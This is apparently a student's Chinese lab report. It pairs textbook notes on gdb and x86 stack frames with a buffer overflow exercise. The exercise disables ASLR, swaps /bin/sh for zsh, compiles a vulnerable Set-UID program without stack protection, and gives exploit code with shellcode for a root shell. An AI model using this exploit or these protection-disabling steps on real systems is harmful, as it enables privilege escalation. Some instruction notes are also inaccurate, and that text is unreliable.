一、教材知识总结:
1.disas 反汇编当前函数。
2.print /x $rax 以十六进制输出%rax的内容
3.info registers查看所有寄存器的值
4.info frame查看有关当前栈帧的信息,并非所有栈帧的信息。
5.使用 up down ,跳转不同堆栈,查询其中的堆栈简要信息。
6.构建栈帧的语句enter等价于pushq %rbp , movq %rsp, %rbp。
7.销毁栈帧的语句leave等价于:movq %rbp, %rsp,popq %rbp。
8.函数调用过程中,栈用来:
传递参数:用栈来管理他的过程所需要的存储空间,栈和程序寄存器存放着传递控制和数据、分配内存所需要的信息”即传递参数。
存储返回信息:当前正在执行的过程的帧总是在栈顶。当过程P调用过程Q时,会把返回地址压入栈中”即存储返回信息
保存寄存器:Q的代码会扩展当前栈的边界,分配她的栈帧所需的空间。在这个空间中,他可以保存寄存器的值,分配局部变量空间”即保存寄存器.
局部存储:为了提高空间和时间效率,x86-64过程只分配自己所需要的栈帧部分”即局部存储。
9.movb:传送字节
10.movw:传送字
11.movl:传送双字
12.movs:符号位扩展
13.movz:零扩展
14.立即数寻址方式:movb %rax,34
15.寄存器寻址方式:movw %bp,%sp
二、缓冲区溢出漏洞实验:
1、实验简介:
缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。这一漏洞可以被恶意用户利用来改变程序的流控制,甚至执行代码的任意片段。这一漏洞的出现 是由于数据缓冲器和返回地址 的暂时关闭,溢出会引起返回地址被重写。
2、实验准备:
实验楼提供的是 64 位 Ubuntu linux,而本次实验为了方便观察汇编语句,我们需要在 32 位环境下作操作,因此实验之前需要做一些准备。
输入命令安装一些用于编译 32 位 C 程序的软件包:
$ sudo apt-get update $ sudo apt-get install -y lib32z1 libc6-dev-i386 $ sudo apt-get install -y lib32readline-gplv2-dev
3、实验步骤:
3.1、初始设置:
1、Ubuntu 和其他一些 Linux 系统中,使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。因此本次实 验中,我们使用以下命令关闭这一功能:
sudo sysctl -w kernel.randomize_va_space=0
过程完成截图:
2、此外,为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击,许多shell程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个 Set-UID 程序调用一个 shell,也不能在这个 shell 中保持 root 权限,这个防护措施在 /bin/bash 中实现。
linux 系统中,/bin/sh 实际是指向 /bin/bash 或 /bin/dash 的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个 shell 程序(zsh)代替 /bin/bash。下面的指令描述了如何设置 zsh 程 序:
$ sudo su $ cd /bin $ rm sh $ ln -s zsh sh $ exit
过程截图:
3.2、shellcode
一般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。而如果覆盖返回地址的数据是另一个地址,那么程序就会跳转到该地址,如果该地址存放的是一段精心设计的代码用于实 现其他功能,这段代码就是 shellcode。
观察以下代码:
#include <stdio.h> int main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); }
本次实验的shellcode,就是刚才代码的汇编版本:
x31xc0x50x68"//sh"x68"/bin"x89xe3x50x53x89xe1x99xb0x0bxcdx80
3.3、漏洞程序:
1、把以下代码保存为“stack.c”文件,保存到 /tmp 目录下。代码如下:
#include <stdlib.h> #include <stdio.h> #include <string.h> int bof(char *str) { char buffer[12]; strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properly "); return 1; }
2、通过代码可以知道,程序会读取一个名为“badfile”的文件,并将文件内容装入“buffer”。编译该程序,并设置 SET-UID。命令如下:
$ sudo su $ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c $ chmod u+s stack $ exit
注:
GCC编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用 –fno-stack-protector
关闭这种机制。 而-z execstack
用于允许执行栈。 -g
参数是为了使编译后得到的可执行文档能用gdb调试。
3.4、攻击程序:
1、我们的目的是攻击刚才的漏洞程序,并通过攻击获得root权限。把以下代码保存为“exploit.c”文件,保存到/tmp目录下。代码如下:
#include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[]= "x31xc0" //xorl %eax,%eax "x50" //pushl %eax "x68""//sh" //pushl $0x68732f2f "x68""/bin" //pushl $0x6e69622f "x89xe3" //movl %esp,%ebx "x50" //pushl %eax "x53" //pushl %ebx "x89xe1" //movl %esp,%ecx "x99" //cdq "xb0x0b" //movb $0x0b,%al "xcdx80" //int $0x80 ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ strcpy(buffer,"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x??x??x??x??"); strcpy(buffer+100,shellcode); /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }
注意上面的代码,x??x??x??x??
处需要添上shellcode
保存在内存中的地址,因为发生溢出后这个位置刚好可以覆盖返回地址。而strcpy(buffer+100,shellcode);
这一句又告诉我们,shellcode
保存 在buffer + 100
的位置。下面我们将详细介绍如何获得我们需要添加的地址。
2、现在我们要得到 shellcode 在内存中的地址,输入命令:
$ gdb stack $ disass main
运行过程及结果截图:
3、按 q 键,再按 enter 键可退出调试
根据语句 strcpy(buffer + 100,shellcode)
; 我们计算 shellcode
的地址为 0xffffd060(十六进制) + 0x64(100的十六进制) = 0xffffd0c4(十六进制)
现在修改exploit.c文件,将 x??x??x??x??
修改为xc4xd0xffxff
然后,编译 exploit.c 程序:
$ gcc -m32 -o exploit exploit.c
3.5、攻击结果:
先运行攻击程序 exploit,再运行漏洞程序 stack,观察结果:
攻击成功!获得root权限